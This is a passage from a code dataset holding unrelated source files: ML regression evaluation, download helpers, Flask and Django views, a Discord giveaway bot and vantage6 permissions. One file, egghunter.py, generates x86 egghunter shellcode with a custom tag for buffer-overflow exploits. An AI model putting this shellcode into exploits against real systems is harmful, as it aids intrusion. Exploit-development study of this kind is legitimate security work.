sel(X_train.values, y_train, n_selected_features=numfeat)\n selscoredf = pd.DataFrame(\n data=np.transpose(np.vstack((X_train.columns[selidx].values, selscore))),\n columns=['Feature', 'Score'])\n\n else:\n selscore = sel(X_train.values, y_train)\n\n selidx = np.argsort(selscore)[::-1]\n # print(selidx)\n selidx = selidx[0:numfeat]\n selscoredf = pd.DataFrame(\n data=np.transpose(np.vstack((X_train.columns[selidx].values, selscore[selidx]))),\n columns=['Feature', 'Score'])\n\n # get subsets for all number of features\n X_train_selected = X_train.iloc[:, selidx[0:numfeat]]\n X_test_selected = X_test.iloc[:, selidx[0:numfeat]]\n\n ##########################################\n # do classification with all classifiers #\n ##########################################\n best_param1 = np.NaN\n best_param2 = np.NaN\n best_balacc = np.NaN\n\n for clf_name, clf in zip(classifiernames, classifiers):\n print(clf_name)\n\n if clf_name is \"Passive Aggressive\":\n param1 = np.NaN\n param2 = np.NaN\n C = [0.25, 0.5, 1, 5, 10]\n for param1 in tqdm(C):\n clf = PassiveAggressiveRegressor(C=param1, random_state=randomstate)\n\n clf.fit(X_train_selected, y_train)\n\n y_pred = clf.predict(X_test_selected)\n y_train_pred = clf.predict(X_train_selected)\n\n balacc, acc, mse, r2, rho = gradeoutput(y_test, y_pred, class_boundary)\n outdf = writeresults(outdf, sel_name, clf_name, split, param1, param2, acc, balacc, mse, r2, rho)\n\n elif clf_name is \"SVR\":\n param1 = np.NaN\n param2 = np.NaN\n C = [0.25, 0.5, 1, 5, 10]\n for param1 in tqdm(C):\n clf = SVR(C=param1)\n\n clf.fit(X_train_selected, y_train)\n\n y_pred = clf.predict(X_test_selected)\n y_train_pred = clf.predict(X_train_selected)\n\n balacc, acc, mse, r2, rho = gradeoutput(y_test, y_pred, class_boundary)\n outdf = writeresults(outdf, sel_name, clf_name, split, param1, param2, acc, balacc, mse, r2, rho)\n\n elif clf_name is \"Decision Tree\":\n param1 = np.NaN\n param2 = np.NaN\n max_depthlist = [2, 3, 4, 6, 8]\n for param1 in tqdm(max_depthlist):\n clf = DecisionTreeRegressor(max_depth=param1, random_state=randomstate)\n\n clf.fit(X_train_selected, y_train)\n\n y_pred = clf.predict(X_test_selected)\n y_train_pred = clf.predict(X_train_selected)\n\n balacc, acc, mse, r2, rho = gradeoutput(y_test, y_pred, class_boundary)\n outdf = writeresults(outdf, sel_name, clf_name, split, param1, param2, acc, balacc, mse, r2, rho)\n\n elif clf_name is \"Extra Tree\":\n param1 = np.NaN\n param2 = np.NaN\n max_depthlist = [2, 3, 4, 6, 8]\n for param1 in tqdm(max_depthlist):\n clf = ExtraTreeRegressor(max_depth=param1, random_state=randomstate)\n\n clf.fit(X_train_selected, y_train)\n\n y_pred = clf.predict(X_test_selected)\n y_train_pred = clf.predict(X_train_selected)\n\n balacc, acc, mse, r2, rho = gradeoutput(y_test, y_pred, class_boundary)\n outdf = writeresults(outdf, sel_name, clf_name, split, param1, param2, acc, balacc, mse, r2, rho)\n\n # elif clf_name is \"Hist. Gradient Boosting\":\n # param1 = np.NaN\n # param2 = np.NaN\n # lr_list = [0.1, 0.3, 0.6, 0.9]\n # for param1 in tqdm(lr_list):\n # clf = HistGradientBoostingClassifier(learning_rate=param1, random_state=randomstate)\n #\n # clf.fit(X_train_selected, y_train)\n #\n # y_pred = clf.predict(X_test_selected)\n # y_train_pred = clf.predict(X_train_selected)\n #\n # balacc, acc, mse, r2, rho = gradeoutput(y_test, y_pred, class_boundary)\n # outdf = writeresults(outdf, sel_name, clf_name, split, param1, param2, acc, balacc, mse, r2, rho)\n\n elif clf_name is \"Huber\":\n param1 = np.NaN\n param2 = np.NaN\n eps_list = [1.1, 1.2, 1.35, 1.5, 2] # epsilon: greater than 1.0, default 1.35\n for param1 in tqdm(eps_list):\n clf = HistGradientBoostingClassifier(learning_rate=param1, random_state=randomstate)\n\n clf.fit(X_train_selected, y_train)\n\n y_pred = clf.predict(X_test_selected)\n y_train_pred = clf.predict(X_train_selected)\n\n balacc, acc, mse, r2, rho = gradeoutput(y_test, y_pred, class_boundary)\n outdf = writeresults(outdf, sel_name, clf_name, split, param1, param2, acc, balacc, mse, r2, rho)\n\n elif clf_name is \"K-Neighbors\":\n param1 = np.NaN\n param2 = np.NaN\n\n neighbors_list = [3, 6, 9, 12, 15, 20] # epsilon: greater than 1.0, default 1.35\n for param1 in tqdm(neighbors_list):\n clf = KNeighborsRegressor(n_neighbors=param1, weights='distance')\n\n clf.fit(X_train_selected, y_train)\n\n y_pred = clf.predict(X_test_selected)\n y_train_pred = clf.predict(X_train_selected)\n\n balacc, acc, mse, r2, rho = gradeoutput(y_test, y_pred, class_boundary)\n outdf = writeresults(outdf, sel_name, clf_name, split, param1, param2, acc, balacc, mse, r2, rho)\n\n elif clf_name is \"Radius Neighbors\":\n param1 = np.NaN\n param2 = np.NaN\n\n radius_list = [1, 2, 5, 10, 15] # epsilon: greater than 1.0, default 1.35\n for param1 in tqdm(radius_list):\n clf = KNeighborsRegressor(radius=param1, weights='distance')\n\n clf.fit(X_train_selected, y_train)\n\n y_pred = clf.predict(X_test_selected)\n y_train_pred = clf.predict(X_train_selected)\n\n balacc, acc, mse, r2, rho = gradeoutput(y_test, y_pred, class_boundary)\n outdf = writeresults(outdf, sel_name, clf_name, split, param1, param2, acc, balacc, mse, r2,\n rho)\n\n else:\n param1 = np.NaN\n param2 = np.NaN\n\n clf.fit(X_train_selected, y_train)\n\n y_pred = clf.predict(X_test_selected)\n y_train_pred = clf.predict(X_train_selected)\n\n balacc, acc, mse, r2, rho = gradeoutput(y_test, y_pred, class_boundary)\n outdf = writeresults(outdf, sel_name, clf_name, split, param1, param2, acc, balacc, mse, r2,\n rho)\n\n\noutdf.to_csv(\"/media/yannick/c4a7e8d3-9ac5-463f-b6e6-92e216ae6ac0/BRATS/BraTS2020/featsel_outputs/cvresults_ageshape_regression.csv\", index=False)\n","sub_path":"classicalml/regression/cveval_regression_ageshape.py","file_name":"cveval_regression_ageshape.py","file_ext":"py","file_size_in_byte":16410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"300634733","text":"from __future__ import print_function\nimport collections\nimport requests\nimport io\nimport os\n\n\n# https://stackoverflow.com/questions/14267555/find-the-smallest-power-of-2-greater-than-n-in-python\ndef next_power_of_2(x):\n return 1 if x == 0 else 2**(x - 1).bit_length()\n\n# original from http://stackoverflow.com/questions/3232943/update-value-of-a-nested-dictionary-of-varying-depth\ndef dict_deep_update(d, u):\n for k, v in u.items():\n if isinstance(v, collections.Mapping):\n r = dict_deep_update(d.get(k, {}), v)\n d[k] = r\n else:\n d[k] = u[k]\n return d\n\ndef nested_setitem(obj, dotted_name, value):\n items = dotted_name.split(\".\")\n for item in items[:-1]:\n if item not in obj:\n obj[item] = {}\n obj = obj[item]\n obj[items[-1]] = value\n\n\ndef download_to_bytes(url, chunk_size=1024*1024*10, loadbar_length=10):\n \"\"\" download a url to bytes\n\n if chunk_size is not None, prints a simple loading bar [=*loadbar_length] to show progress (in console and notebook)\n\n :param url: str or url\n :param chunk_size: None or int in bytes\n :param loadbar_length: int length of load bar\n :return: (bytes, encoding)\n \"\"\"\n\n stream = False if chunk_size is None else True\n\n print(\"Downloading {0:s}: \".format(url), end=\"\")\n\n response = requests.get(url, stream=stream)\n # raise error if download was unsuccessful\n response.raise_for_status()\n\n encoding = response.encoding\n total_length = response.headers.get('content-length')\n if total_length is not None:\n total_length = float(total_length)\n if stream:\n print(\"{0:.2f}Mb/{1:} \".format(total_length / (1024 * 1024), loadbar_length), end=\"\")\n else:\n print(\"{0:.2f}Mb \".format(total_length / (1024 * 1024)), end=\"\")\n\n if stream:\n print(\"[\", end=\"\")\n chunks = []\n loaded = 0\n loaded_size = 0\n for chunk in response.iter_content(chunk_size=chunk_size):\n if chunk: # filter out keep-alive new chunks\n # print our progress bar\n if total_length is not None:\n while loaded < loadbar_length * loaded_size / total_length:\n print(\"=\", end='')\n loaded += 1\n loaded_size += chunk_size\n chunks.append(chunk)\n if total_length is None:\n print(\"=\" * loadbar_length, end='')\n else:\n while loaded < loadbar_length:\n print(\"=\", end='')\n loaded += 1\n content = b\"\".join(chunks)\n print(\"] \", end=\"\")\n else:\n content = response.content\n print(\"Finished\")\n\n response.close()\n\n return content, encoding\n\n\ndef download_yield_bytes(url, chunk_size=1024*1024*10):\n \"\"\" yield a downloaded url as byte chunks\n\n :param url: str or url\n :param chunk_size: None or int in bytes\n :yield: byte chunks\n \"\"\"\n\n response = requests.get(url, stream=True)\n # raise error if download was unsuccessful\n response.raise_for_status()\n\n total_length = response.headers.get('content-length')\n if total_length is not None:\n total_length = float(total_length)\n length_str = \"{0:.2f}Mb \".format(total_length / (1024 * 1024))\n else:\n length_str = \"\"\n\n print(\"Yielding {0:s} {1:s}\".format(url, length_str))\n for chunk in response.iter_content(chunk_size=chunk_size):\n yield chunk\n response.close()\n\n\ndef download_to_file(url, filepath, resume=False, overwrite=False, chunk_size=1024*1024*10, loadbar_length=10):\n \"\"\" download a url\n\n prints a simple loading bar [=*loadbar_length] to show progress (in console and notebook)\n\n :type url: str\n :type filepath: str\n :param filepath: path to download to\n :param resume: if True resume download from existing file chunk\n :param overwrite: if True remove any existing filepath\n :param chunk_size: None or int in bytes\n :param loadbar_length: int length of load bar\n :return:\n \"\"\"\n\n resume_header = None\n loaded_size = 0\n write_mode = 'wb'\n\n if os.path.exists(filepath):\n if overwrite:\n os.remove(filepath)\n elif resume:\n # if we want to resume, first try and see if the file is already complete\n loaded_size = os.path.getsize(filepath)\n clength = requests.head(url).headers.get('content-length')\n if clength is not None:\n if int(clength) == loaded_size:\n return None\n # give the point to resume at\n resume_header = {'Range': 'bytes=%s-' % loaded_size}\n write_mode = 'ab'\n else:\n return None\n\n stream = False if chunk_size is None else True\n\n # start printing with no return character, so that we can have everything on one line\n print(\"Downloading {0:s}: \".format(url), end=\"\")\n\n response = requests.get(url, stream=stream, headers=resume_header)\n # raise error if download was unsuccessful\n response.raise_for_status()\n\n # get the size of the file if available\n total_length = response.headers.get('content-length')\n if total_length is not None:\n total_length = float(total_length) + loaded_size\n print(\"{0:.2f}Mb/{1:} \".format(total_length / (1024 * 1024), loadbar_length), end=\"\")\n print(\"[\", end=\"\")\n\n parent = os.path.dirname(filepath)\n if not os.path.exists(parent) and parent:\n os.makedirs(parent)\n\n with io.open(filepath, write_mode) as f:\n loaded = 0\n for chunk in response.iter_content(chunk_size=chunk_size):\n if chunk: # filter out keep-alive new chunks\n # print our progress bar\n if total_length is not None and chunk_size is not None:\n while loaded < loadbar_length*loaded_size/total_length:\n print(\"=\", end='')\n loaded += 1\n loaded_size += chunk_size\n f.write(chunk)\n if total_length is None:\n print(\"=\" * loadbar_length, end='')\n else:\n while loaded < loadbar_length:\n print(\"=\", end='')\n loaded += 1\n print(\"] Finished\")\n","sub_path":"ipyvolume/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"558307154","text":"import datetime\nwhile True:\n num=input(\"Enter your number: \")\n if 1<=int(num)<=7:\n first=datetime.date(2021,4,10)\n day=first+datetime.timedelta(days=int(num))\n week=day.strftime('%A')\n print(week)\n else:\n print(\"You can use only 1 between 7 \")\n\n","sub_path":"Time/Time_task_9.4.py","file_name":"Time_task_9.4.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"297882709","text":"#-*- coding: utf-8 -*-\nfrom app import app\nfrom flask import render_template, request, flash, redirect, session, url_for\nfrom datetime import timedelta\nfrom forms import SignupForm, LoginForm\nfrom models import db, User, Match, and_\nfrom util import Util, MatchingUtil\nfrom api import MatchingUser\n\n@app.before_request\ndef make_session_permanent():\n session.permanent = True\n app.permanent_session_lifetime = timedelta(minutes=60)\n\n@app.route('/')\ndef home():\n\tif 'email' in session and User.verify_auth_token(session['token'], app.config['SECRET_KEY']):\n\t\treturn redirect(url_for('profile'))\n\telse:\n\t\treturn render_template('index.html')\n\n@app.route('/match')\ndef match():\n\tif 'email' in session and User.verify_auth_token(session['token'], app.config['SECRET_KEY']):\n\t\treturn render_template('match.html')\n\telse:\n\t\treturn redirect(url_for('login'))\n\n@app.route('/signup', methods=['GET', 'POST'])\ndef signup():\n\tform = SignupForm()\n\n\tif request.method == 'POST':\n\t\tif form.validate() is False:\n\t\t\treturn render_template('signup.html', form=form)\n\t\telse:\n\t\t\tnew_user = User(form.name.data,\n\t\t\t\tform.password.data,\n\t\t\t\tform.gender.data,\n\t\t\t\tform.age.data,\n\t\t\t\tform.email.data,\n\t\t\t\tform.location.data,\n\t\t\t\tform.favorite_area.data)\n\t\t\tdb.session.add(new_user)\n\t\t\tdb.session.commit()\n\n\t\t\tsession['email'] = new_user.email\n\n\t\t\treturn redirect(url_for('profile'))\n\n\telif request.method == 'GET':\n\t\treturn render_template('signup.html', form=form)\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n\tform = LoginForm()\n\n\tif 'email' in session:\n\t\treturn redirect(url_for('profile'))\n\n\tif request.method == 'POST':\n\t\tif form.validate() is False:\n\t\t\treturn render_template('login.html', form=form)\n\t\telse:\n\t\t\tsession['email'] = form.email.data\n\t\t\treturn redirect(url_for('profile'))\n\telif request.method == 'GET':\n\t\treturn render_template('login.html', form=form)\n\n@app.route('/profile')\ndef profile():\n\tif 'email' not in session:\n\t\treturn redirect(url_for('login'))\n\n\tuser = User.query.filter_by(email = session['email']).first()\n\ttoken = user.generate_auth_token(app.config['SECRET_KEY'])\n\tsession['token'] = token\n\tif user is None:\n\t\treturn redirect(url_for('login'))\n\telse:\n\t\treturn render_template('profile.html', data=user)\n\n@app.route('/logout')\ndef logout():\n\tif 'email' not in session:\n\t\treturn redirect(url_for('login'))\n\n\tsession.pop('email', None)\n\tsession.pop('token', None)\n\tsession.clear()\n\treturn redirect(url_for('home'))","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"612469365","text":"import discord\nfrom discord.ext import commands\nfrom .utils.dataIO import fileIO\nfrom .utils import checks\nimport os\nimport asyncio\nimport time\nimport logging\nimport random\nimport datetime\n\n\nclass MOTORSPORT_GIVEAWAY:\n \"\"\"Its all about MotorSport - Giveaway System\"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n self.giveaways = fileIO(\"data/MotorSport/giveaway/giveaway.json\", \"load\")\n self.units = {\"second\": 1, \"day\": 86400, \"week\": 604800, \"month\": 2592000}\n\n @commands.command(pass_context=True, no_pm=True)\n @checks.admin_or_permissions()\n async def giveaway(self, ctx, quantity: int, time_unit: str, *, message: str):\n \"\"\"Generate Giveaway\n\n The time unit must be: days, weeks, month\n For example:\n .giveaway 3 days Holiday Time\"\"\"\n author = ctx.message.author\n server = ctx.message.server\n time_unit = time_unit.lower()\n s = \"\"\n if time_unit.endswith(\"s\"):\n time_unit = time_unit[:-1]\n s = \"s\"\n if not time_unit in self.units:\n await self.bot.say(\"Invalid time unit. Choose days/weeks/month\")\n return\n if quantity < 1:\n await self.bot.say(\"Quantity must not be 0 or negative.\")\n return\n if len(message) > 1960:\n await self.bot.say(\"The message is too long.\")\n return\n name = author.nick\n seconds = self.units[time_unit] * quantity\n future = int(time.time() + seconds)\n logger.info(\"{} ({}) start giveaway.\".format(author.name, author.id))\n giveaways_channel = discord.utils.get(\n server.channels, name='giveaways', type=discord.ChannelType.text)\n embed = discord.Embed(title=\"Premium Deluxe Motorsport Giveaway\", colour=discord.Colour(\n 0x984c87), description=message + \"\\n\\n**To join, react with 🏆**\")\n embed.set_thumbnail(url=server.icon_url)\n msg = await self.bot.send_message(giveaways_channel, embed=embed)\n reaction = '🏆'\n await self.bot.add_reaction(msg, reaction)\n await self.bot.delete_message(ctx.message)\n self.giveaways.append({\"ID\": author.id, \"msg\": msg.id, \"FUTURE\": future, \"message\": message})\n fileIO(\"data/MotorSport/giveaway/giveaway.json\", \"save\", self.giveaways)\n\n async def check_giveaway(self):\n getMSserver = self.bot.get_server('341928926098096138')\n giveaways_channel = discord.utils.get(getMSserver.channels, name='giveaways', type=discord.ChannelType.text)\n management_channel = discord.utils.get(getMSserver.channels, name='management', type=discord.ChannelType.text)\n won_role = discord.utils.get(getMSserver.roles, name='The Winners')\n while self is self.bot.get_cog(\"MOTORSPORT_GIVEAWAY\"):\n to_remove = []\n for giveaway in self.giveaways:\n if giveaway[\"FUTURE\"] <= int(time.time()):\n count = 1\n try:\n themessage = await self.bot.get_message(giveaways_channel, giveaway[\"msg\"])\n result = await self.bot.get_reaction_users(themessage.reactions[0])\n if len(result) <= 1:\n winner = self.bot.user\n winner2 = 'Nobody'\n else:\n winner = random.choice(result)\n while True:\n the_member = getMSserver.get_member(winner.id)\n if any(r.name == 'The Winners' for r in the_member.roles) or winner == self.bot.user:\n winner = random.choice(result)\n count = count + 1\n else:\n winner2 = winner.mention\n break\n if count > 5:\n winner2 = 'Nobody'\n break\n embed = discord.Embed(title=\"Premium Deluxe Motorsport Giveaway\", colour=discord.Colour(\n 0x984c87), description=\"{}\\n\\n{} wins\".format(giveaway[\"message\"], winner2))\n if winner.avatar_url is None:\n embed.set_thumbnail(url=getMSserver.icon_url)\n else:\n embed.set_thumbnail(url=winner.avatar_url)\n # embed.set_author(name=name, icon_url=server.icon_url)\n await self.bot.delete_message(themessage)\n final_result = \"User List from {}: \".format(giveaway[\"message\"])\n for r in result:\n final_result = final_result + \"{}#{}, \".format(r.name, r.discriminator)\n if winner2 == 'Nobody':\n embed.set_thumbnail(url=getMSserver.icon_url)\n await self.bot.send_message(management_channel, final_result)\n await self.bot.send_message(giveaways_channel, embed=embed)\n if winner2 != 'Nobody':\n try:\n await self.bot.send_message(winner, embed=embed)\n except discord.errors.Forbidden:\n await self.bot.send_message(management_channel, \"**[Warning]** {} turned off his PM\".format(winner.mention))\n await self.bot.add_roles(the_member, won_role)\n # await self.bot.send_message(discord.User(id=inactive[\"ID\"]), embed=embed)\n except (discord.errors.Forbidden, discord.errors.NotFound):\n to_remove.append(giveaway)\n except discord.errors.HTTPException:\n pass\n else:\n to_remove.append(giveaway)\n if giveaway[\"FUTURE\"] > int(time.time()):\n try:\n themessage = await self.bot.get_message(giveaways_channel, giveaway[\"msg\"])\n timeleft = giveaway[\"FUTURE\"] - int(time.time())\n embed = discord.Embed(title=\"Premium Deluxe Motorsport Giveaway\", colour=discord.Colour(0x984c87), description=giveaway[\"message\"] + \"\\n\\n**To join, react with 🏆**\\n\\n**Time Left: {}**\".format(datetime.timedelta(seconds=timeleft)))\n embed.set_thumbnail(url=getMSserver.icon_url)\n await self.bot.edit_message(themessage, embed=embed)\n except (discord.errors.Forbidden, discord.errors.NotFound):\n to_remove.append(giveaway)\n except discord.errors.HTTPException:\n pass\n for giveaway in to_remove:\n self.giveaways.remove(giveaway)\n if to_remove:\n fileIO(\"data/MotorSport/giveaway/giveaway.json\", \"save\", self.giveaways)\n await asyncio.sleep(5)\n\n\ndef check_folders():\n if not os.path.exists(\"data/MotorSport/giveaway/\"):\n print(\"Creating data/MotorSport/giveaway/ folder...\")\n os.makedirs(\"data/MotorSport/giveaway/\")\n\n\ndef check_files():\n f = \"data/MotorSport/giveaway/giveaway.json\"\n if not fileIO(f, \"check\"):\n print(\"Creating empty giveaway.json...\")\n fileIO(f, \"save\", [])\n\n\ndef setup(bot):\n global logger\n check_folders()\n check_files()\n logger = logging.getLogger(\"giveaway\")\n if logger.level == 0: # Prevents the logger from being loaded again in case of module reload\n logger.setLevel(logging.INFO)\n handler = logging.FileHandler(\n filename='data/MotorSport/giveaway/giveaway.log', encoding='utf-8', mode='a')\n handler.setFormatter(logging.Formatter(\n '%(asctime)s %(message)s', datefmt=\"[%d/%m/%Y %H:%M]\"))\n logger.addHandler(handler)\n n = MOTORSPORT_GIVEAWAY(bot)\n loop = asyncio.get_event_loop()\n loop.create_task(n.check_giveaway())\n bot.add_cog(n)\n","sub_path":"MotorSport-Giveaway/MotorSport-Giveaway.py","file_name":"MotorSport-Giveaway.py","file_ext":"py","file_size_in_byte":8143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"572361543","text":"import numpy as np\n\nEMPTY = 0\n\nINVERSE = -1\n\nBLACK = -1\nWHITE = 1\n\nPAWN = 1\nROOK = 2\nKNIGHT = 3\nBISHOP = 4\nQUEEN = 5\nKING = 6\n\n\nclass Board:\n def __init__(self):\n self.__board = np.array([[2, 3, 4, 5, 6, 4, 3, 2],\n [1, 1, 1, 1, 1, 1, 1, 1],\n [0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0],\n [-1, -1, -1, -1, -1, -1, -1, -1],\n [-2, -3, -4, -5, -6, -4, -3, -2]])\n self.__movedRooks = np.array([0, 0, 0, 0]) # wRook1,wRook2, bRook1, bRook2\n self.__movedKings = np.array([0, 0])\n\n def print(self):\n for i in range(0, 8, 1):\n for j in range(0, 8, 1):\n print(\"%3d\" % (self.__board[7 - i][j]), end='')\n\n print()\n print()\n\n def update(self, a1, a2, b1, b2):\n if a1 < 0 or a1 > 7 or a2 < 0 or a2 > 7 or b1 < 0 or b1 > 7 or b2 < 0 or b2 > 7:\n return False\n\n self.__board[b1][b2] = self.__board[a1][a2]\n self.__board[a1][a2] = 0\n\n return True\n\n # returns array of [[a1,a2,b1,b2],[a1,....],[...],]\n def get_possible_moves(self, color):\n pm = []\n if color != BLACK and color != WHITE:\n raise (ValueError, \"Color specified as \" + color)\n for i in range(0,8,1):\n for j in range(0,8,1):\n piece = self.__board[i][j]\n if color == BLACK and piece >= BLACK * KING and piece <= BLACK * PAWN \\\n or color == WHITE and piece >= WHITE * PAWN and piece <= BLACK * PAWN :\n if piece == color * PAWN:\n if(self.__board[i + color][j] == EMPTY):\n pm.append(np.array([i,j,i + color,j]))\n\n\n\nclass Game:\n def __init__(self):\n self.board = Board()\n self.round = 0\n self.atTurn = BLACK\n\n\nboard = Board()\nboard.print()\n\nprint(board.get_possible_moves(BLACK))","sub_path":"src/chess/old (-2018-02-13)/dev.py","file_name":"dev.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"371404604","text":"from __future__ import print_function\nfrom sys import argv, exit\nfrom textwrap import wrap\n\neggs = []\n\ndef convert(x):\n for x in tag:\n eggs.append('\\\\x{:02x}'.format(ord(x)))\n\ndef eggFormat():\n egg = '\\\\x66\\\\x81\\\\xca\\\\xff\\\\x0f\\\\x42\\\\x52\\\\x6a\\\\x02\\\\x58\\\\xcd\\\\x2e\\\\x3c\\\\x05\\\\x5a\\\\x74\\\\xef\\\\xb8'\n egg += '{}'.format(''.join(eggs))\n egg += '\\\\x8b\\\\xfa\\\\xaf\\\\x75\\\\xea\\\\xaf\\\\x75\\\\xe7\\\\xff\\\\xe7'\n return wrap(egg, 52)\n\ndef main():\n convert(tag)\n print('[+] Your {} egghunter is below:\\n'.format(tag))\n print('egghunter = \\'\\'')\n for egg in eggFormat():\n print('egghunter += \\'{}\\''.format(egg))\n\nif __name__ == '__main__':\n print('[+] Makes getting your own tags for the egghunter easier.')\n try:\n tag = argv[1]\n except IndexError:\n print('[!] Usage: {} [ 2 byte tag e.g. W00T ]'.format(argv[0]))\n exit()\n if len(tag) != 4:\n print('[!] Not a 2 byte word')\n else:\n main()\n","sub_path":"egghunter.py","file_name":"egghunter.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"573757582","text":"from django.urls import path\n\nfrom . import views\n\napp_name = \"users\"\nurlpatterns = [\n path(\"~redirect/\",\n view=views.UserRedirectView.as_view(),\n name=\"redirect\"\n ),\n path(\"~update/\",\n view=views.UserUpdateView.as_view(),\n name=\"update\"\n ),\n path(\n \"\",\n view=views.UserDetailView.as_view(),\n name=\"detail\",\n ),\n path(\"questions/\",\n view=views.question_list,\n name=\"questions\"\n ),\n path(\"questions//\",\n view=views.update_answer\n ),\n]\n","sub_path":"university_dost/users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"184038622","text":"import random\n\n\ndef intcheck(question, low, high):\n valid = False\n while not valid:\n try:\n response = int(input(question))\n if low <= response <= high:\n print(\"Well done\")\n return response\n\n elif low >= response >= high:\n print(\"The answer is between 0 and 1000\")\n\n else:\n print(\"WRONG!!\")\n print()\n except ValueError:\n print(\"Please enter an integer\")\n print()\n\n\nlowest = 0\nhighest = 1000\n\nplay_again = \"\"\nwhile play_again == \"\":\n\n num = random.randint(lowest, highest)\n num1 = random.randint(lowest, highest)\n\n math = num + num1\n\n # rounds = intcheck(\"How many rounds?\", 1, 10) #\n round1 = intcheck(\"{} + {}\".format(num, num1), math, math)\n\n play_again = (input(\"Push \"))\n\nprint(\"Thank You For Playing\")","sub_path":"sandpit.py","file_name":"sandpit.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"92356845","text":"import logging\nimport importlib\n\nfrom collections import namedtuple\nfrom flask_principal import Permission, PermissionDenied\n\nfrom vantage6.server.globals import RESOURCES\nfrom vantage6.server.default_roles import DefaultRole\nfrom vantage6.server.model.role import Role\nfrom vantage6.server.model.rule import Rule, Operation, Scope\nfrom vantage6.server.model.base import DatabaseSessionManager\nfrom vantage6.common import logger_name\n\nmodule_name = logger_name(__name__)\nlog = logging.getLogger(module_name)\n\nRuleNeed = namedtuple(\"RuleNeed\", [\"name\", \"scope\", \"operation\"])\n\n\nclass RuleCollection:\n \"\"\"\n Class that tracks a set of all rules for a certain resource name\n\n Parameters\n ----------\n name: str\n Name of the resource endpoint (e.g. node, organization, user)\n \"\"\"\n\n def __init__(self, name: str) -> None:\n self.name = name\n\n def add(self, scope: Scope, operation: Operation) -> None:\n \"\"\"\n Add a rule to the rule collection\n\n Parameters\n ----------\n scope: Scope\n Scope within which to apply the rule\n operation: Operation\n What operation the rule applies to\n \"\"\"\n permission = Permission(RuleNeed(self.name, scope, operation))\n self.__setattr__(f'{operation.value}_{scope.value}', permission)\n\n\nclass PermissionManager:\n \"\"\"\n Loads the permissions and syncs rules in database with rules defined in\n the code\n \"\"\"\n\n def __init__(self) -> None:\n self.collections = {}\n log.info(\"Loading permission system...\")\n self.load_rules_from_resources()\n\n def load_rules_from_resources(self) -> None:\n \"\"\"\n Collect all permission rules from all registered API resources\n \"\"\"\n for res in RESOURCES:\n module = importlib.import_module('vantage6.server.resource.' + res)\n try:\n module.permissions(self)\n except Exception:\n module_name = module.__name__.split(\".\")[-1]\n log.debug(f\"Resource '{module_name}' contains no or invalid \"\n \"permissions\")\n\n def assign_rule_to_root(self, name: str, scope: Scope,\n operation: Operation) -> None:\n \"\"\"\n Assign a rule to the root role.\n\n resource: str\n Resource that the rule applies to\n scope: Scope\n Scope that the rule applies to\n operation: Operation\n Operation that the rule applies to\n \"\"\"\n self.assign_rule_to_fixed_role(DefaultRole.ROOT, name, scope,\n operation)\n\n def assign_rule_to_node(self, resource: str, scope: Scope,\n operation: Operation) -> None:\n \"\"\"\n Assign a rule to the Node role.\n\n Parameters\n ----------\n resource: str\n Resource that the rule applies to\n scope: Scope\n Scope that the rule applies to\n operation: Operation\n Operation that the rule applies to\n \"\"\"\n self.assign_rule_to_fixed_role(DefaultRole.NODE, resource, scope,\n operation)\n\n def assign_rule_to_container(self, resource: str, scope: Scope,\n operation: Operation) -> None:\n \"\"\"\n Assign a rule to the container role.\n\n Parameters\n ----------\n resource: str\n Resource that the rule applies to\n scope: Scope\n Scope that the rule applies to\n operation: Operation\n Operation that the rule applies to\n \"\"\"\n self.assign_rule_to_fixed_role(DefaultRole.CONTAINER, resource, scope,\n operation)\n\n @staticmethod\n def assign_rule_to_fixed_role(fixedrole: str, resource: str, scope: Scope,\n operation: Operation) -> None:\n \"\"\"\n Attach a rule to a fixed role (not adjustable by users).\n\n Parameters\n ----------\n fixedrole: str\n Name of the fixed role that the rule should be added to\n resource: str\n Resource that the rule applies to\n scope: Scope\n Scope that the rule applies to\n operation: Operation\n Operation that the rule applies to\n \"\"\"\n role = Role.get_by_name(fixedrole)\n if not role:\n log.warning(f\"{fixedrole} role not found, creating it now!\")\n role = Role(name=fixedrole, description=f\"{fixedrole} role\")\n\n rule = Rule.get_by_(resource, scope, operation)\n if not rule:\n log.error(f\"Rule ({resource},{scope},{operation}) not found!\")\n\n if rule not in role.rules:\n role.rules.append(rule)\n log.info(f\"Rule ({resource},{scope},{operation}) added to \"\n f\"{fixedrole} role!\")\n\n def register_rule(self, resource: str, scope: Scope,\n operation: Operation, description=None,\n assign_to_node=False, assign_to_container=False) -> None:\n \"\"\"\n Register a permission rule in the database.\n\n If a rule already exists, nothing is done. This rule can be used in API\n endpoints to determine if a user, node or container can do a certain\n operation in a certain scope.\n\n Parameters\n ----------\n resource : str\n API resource that the rule applies to\n scope : Scope\n Scope of the rule\n operation : Operation\n Operation of the rule\n description : String, optional\n Human readable description where the rule is used for, by default\n None\n assign_to_node: bool, optional\n Whether rule should be assigned to the node role or not. Default\n False\n assign_to_container: bool, optional\n Whether rule should be assigned to the container role or not.\n Default False\n \"\"\"\n # verify that the rule is in the DB, so that these can be assigned to\n # roles and users\n rule = 